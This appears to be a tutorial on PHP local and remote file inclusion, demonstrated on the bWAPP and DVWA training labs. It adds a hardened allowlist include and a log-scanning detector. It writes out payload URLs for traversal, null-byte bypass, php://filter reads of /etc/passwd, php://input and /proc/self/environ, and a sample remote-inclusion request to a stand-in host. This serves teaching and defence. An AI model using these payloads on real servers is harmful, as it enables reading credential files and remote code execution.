A developer can insert the content of one PHP file into another PHP file,
before the server executes it, with the include() function.
The function is commonly used to pull in shared functions, headers, footers or
other elements that are reused on multiple pages.
This makes it easy for developers to change the layout of a
complete website with minimal effort: if a change is required,
only the included file has to be edited instead of thousands of
files.
The require() statement is also used to include a file
into the PHP code. However, there is a big difference between include
and require: when a file is included with the include statement and
PHP cannot find it, the script will continue to execute.
With the require statement, the script will not continue if the file is not
available; it raises a fatal error instead.
The require_once() statement
also includes the called file, but only once, for the case where the
file may be included from several places. The
only difference between require and require_once is that if require_once
finds the file has already been included, the calling script
ignores further inclusions.
Note: allow_url_include is disabled by default. If allow_url_fopen is
disabled, allow_url_include is also disabled.
File Inclusion
Attacks:
A file inclusion vulnerability allows an attacker to include a file on the web server through a
PHP script. It arises when a web application lets the
client's input decide which file is included, or lets the client upload files to the server.
There are two types of File Inclusion Attack:
a) Local File Inclusion
b) Remote File Inclusion
Basic Local
File Inclusion:
An LFI
vulnerability allows the user
to include a local file by manipulating the URL in the browser.
In this article I have used two different platforms, bWAPP and DVWA,
which contain file inclusion vulnerabilities.
Below is the file which we are going to attack:
{Please look image 01}
Before
we select the “English” language, the URL is
http://192.168.93.156/bwapp/bWAPP/rlfi.php
After
selecting the language, the URL is
http://192.168.93.156/bwapp/bWAPP/rlfi.php?language=lang_en.php&action=go
We can see the change: the selected language file now appears as a parameter in the
URL. I will change the path to a different file to check whether the page is
vulnerable.
When I change the file path to the one below,
http://192.168.93.156/bwapp/bWAPP/rlfi.php?language=../../index.html
{Please look image 02}
{Please look image 03}
Null Byte:
After raising the security level, the same file path no longer works.
{Please look image 04}
With the help of Burp Suite Interceptor, we captured the request
and forwarded it to Burp Suite Repeater.
{Please look image 05}
By adding a “null character” at the end of the file name, it worked as
expected.
Base64 Encoded:
There is another way to exploit LFI if the security level is high.
Below is the URL that uses the PHP filter wrapper:
http://192.168.1.101/bWAPP/rlfi.php?language=php://filter/read=convert.base64-encode/resource=/etc/passwd
{Please look image 06}
Below is the base64 encoded value of /etc/passwd,
Decode the above value with the help of Burp Suite Decoder.
We can also use HackBar, a Firefox plugin, to decode the above
base64 value:
{Please look image 07}
PHP Input:
Using the php://input wrapper we will execute injected PHP code to exploit the
LFI vulnerability. We will perform this task with the help of HackBar.
{Please look image 08}
Manipulate the value inside the HackBar tool.
{Please look image 09}
{Please look image 10}
Proc/Self/Environ:
If the server is not kept up to date with patching, it may be
exploitable through LFI.
/proc/self/environ is a file that exposes the process environment, in which the
User-Agent details appear. We will use this file to carry our PHP code for executing commands.
{Please look image 11}
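The following is an added example, not code from the article, bWAPP or DVWA. It places the vulnerable include shape that the Local File Inclusion, Null Byte, Base64 Encoded, PHP Input and Proc/Self/Environ sections above all rely on beside a hardened replacement: the client sends an opaque key that is looked up in an allowlist, the resolved path is checked against its base directory, and the payload shapes from those sections are refused and logged before any lookup. The ./lang/ directory, the file names lang_en.php, lang_fr.php and lang_nl.php, and the function names resolveLanguageFile, looksLikeInclusionPayload and remoteInclusionEnabled are assumptions made for this example:

```php
<?php
// Added example, not code from bWAPP, DVWA or the article. It assumes a
// language-selection page whose translation files live in ./lang/ next to
// this script and are named lang_en.php, lang_fr.php, ... (assumption).
declare(strict_types=1);

// Vulnerable shape (assumed simplification of a page like rlfi.php):
//     include($_GET['language']);
// The raw parameter reaches include(), so "../../index.html",
// "php://filter/...", "php://input" and "/proc/self/environ" are all
// honoured exactly as the article shows.

// Hardened shape: the client sends an opaque key, never a file name.
const LANGUAGE_FILES = [
    'en' => 'lang_en.php',
    'fr' => 'lang_fr.php',
    'nl' => 'lang_nl.php',
];

/**
 * Map a client-supplied key to an absolute path below $baseDir.
 * Returns null whenever the request must be refused.
 */
function resolveLanguageFile(string $key, string $baseDir): ?string
{
    // 1. Allowlist lookup: nothing from the raw value is used as a path.
    if (!array_key_exists($key, LANGUAGE_FILES)) {
        return null;
    }
    // 2. Defence in depth: the resolved path must still sit below $baseDir
    //    (catches a mis-edited allowlist entry or a symlink pointing out).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . LANGUAGE_FILES[$key]);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

/**
 * Recognise the payload shapes from this article so they can be logged
 * and refused before any lookup happens.
 */
function looksLikeInclusionPayload(string $raw): bool
{
    return str_contains($raw, "\0")                           // null-byte truncation
        || str_contains($raw, '..')                           // directory traversal
        || preg_match('#^[a-z][a-z0-9+.\-]*:#i', $raw) === 1   // any URL scheme: php:, http:, data: ...
        || str_contains($raw, '/proc/');                      // /proc/self/environ
}

/** Report whether php.ini still permits remote inclusion (see the Note above). */
function remoteInclusionEnabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

if (remoteInclusionEnabled()) {
    error_log('warning: allow_url_include is On; remote file inclusion is possible');
}

$raw = $_GET['language'] ?? 'en';
if (!is_string($raw)) {            // language[]=... would arrive as an array
    http_response_code(400);
    exit;
}
if (looksLikeInclusionPayload($raw)) {
    error_log('file inclusion attempt refused: ' . bin2hex($raw));
    http_response_code(400);
    exit;
}

$file = resolveLanguageFile($raw, __DIR__ . '/lang');
if ($file === null) {
    http_response_code(400);
    exit('unknown language');
}
include $file;
```

The allowlist alone closes every variant in this article, because no part of the client's value is ever used as a path; the realpath containment check and the payload filter are there so that a later edit to the allowlist, or a symlink under ./lang/, cannot silently reopen the hole, and so that attempts are visible in the error log.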
Remote File Inclusion:
Remote file inclusion occurs when the URL of a file located on a
different server is passed as a parameter to one of the PHP functions
“include”, “include_once”, “require” or
“require_once”. PHP incorporates the content into the page. If
the content happens to be PHP source code, PHP executes it.
{Please look image 12}
{Please look image 13}
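As an added detection example (not part of the article or of the bWAPP/DVWA projects), the script below scans Common Log Format access-log lines for the request shapes used in the LFI and RFI sections: directory traversal, null bytes, the php://filter and php://input wrappers, /proc/self/environ, and a remote URL in the parameter. It percent-decodes each request target repeatedly so that double-encoded payloads are seen too. The log lines in $sampleLog are constructed for the example, and scanAccessLog and normalizeTarget are names chosen here:

```php
<?php
// Added example, not part of the article or of bWAPP/DVWA. It scans
// access-log lines for the inclusion indicators shown in this article.
// The log lines in $sampleLog are constructed for the example.
declare(strict_types=1);

// Each indicator is matched against the percent-decoded request target.
const INDICATORS = [
    'directory traversal'     => '#\.\.[/\\\\]#',
    'null-byte truncation'    => '#\x00#',
    'php://filter wrapper'    => '#php://filter#i',
    'php://input wrapper'     => '#php://input#i',
    '/proc/self/environ read' => '#/proc/self/environ#i',
    'remote URL in parameter' => '#=(?:https?|ftp)://#i',
];

/** Percent-decode repeatedly so double-encoded payloads (%252e...) are seen too. */
function normalizeTarget(string $target): string
{
    for ($round = 0; $round < 3; $round++) {
        $decoded = rawurldecode($target);
        if ($decoded === $target) {
            break;
        }
        $target = $decoded;
    }
    return $target;
}

/**
 * Return one hit per (line, indicator):
 * ['line' => n, 'indicator' => name, 'client' => ip, 'request' => original target].
 */
function scanAccessLog(array $lines): array
{
    $hits = [];
    foreach ($lines as $index => $line) {
        // Common Log Format: client IP first, request target inside the quoted field.
        if (preg_match('#^(\S+) .*?"(?:GET|POST) (\S+) HTTP/#', $line, $m) !== 1) {
            continue;
        }
        $target = normalizeTarget($m[2]);
        foreach (INDICATORS as $name => $pattern) {
            if (preg_match($pattern, $target) === 1) {
                $hits[] = [
                    'line'      => $index + 1,
                    'indicator' => $name,
                    'client'    => $m[1],
                    'request'   => $m[2],
                ];
            }
        }
    }
    return $hits;
}

// Constructed sample: one benign request followed by the request shapes from this article.
$sampleLog = [
    '192.168.93.1 - - [01/Jan/2024:10:00:00 +0000] "GET /bWAPP/rlfi.php?language=lang_en.php&action=go HTTP/1.1" 200 2048',
    '192.168.93.1 - - [01/Jan/2024:10:00:05 +0000] "GET /bWAPP/rlfi.php?language=../../index.html HTTP/1.1" 200 1371',
    '192.168.93.1 - - [01/Jan/2024:10:00:09 +0000] "GET /bWAPP/rlfi.php?language=..%252F..%252Findex.html%2500 HTTP/1.1" 200 1371',
    '192.168.93.1 - - [01/Jan/2024:10:00:14 +0000] "GET /bWAPP/rlfi.php?language=php://filter/read=convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 3120',
    '192.168.93.1 - - [01/Jan/2024:10:00:20 +0000] "POST /bWAPP/rlfi.php?language=php://input HTTP/1.1" 200 640',
    '192.168.93.1 - - [01/Jan/2024:10:00:27 +0000] "GET /bWAPP/rlfi.php?language=/proc/self/environ HTTP/1.1" 200 980',
    '192.168.93.1 - - [01/Jan/2024:10:00:33 +0000] "GET /bWAPP/rlfi.php?language=http://remote.example/page.txt HTTP/1.1" 200 512',
];

foreach (scanAccessLog($sampleLog) as $hit) {
    printf("line %d  %-25s %s  %s\n", $hit['line'], $hit['indicator'], $hit['client'], $hit['request']);
}
```

The benign first line matches nothing. normalizeTarget decodes the third line twice, so it is checked as `../../index.html` followed by a NUL byte rather than as the harmless-looking `%252F` text the server logged; a single decode would miss both indicators on that line. The patterns are deliberately narrow to the shapes this article demonstrates, so a production rule set would extend INDICATORS rather than replace the scanning logic.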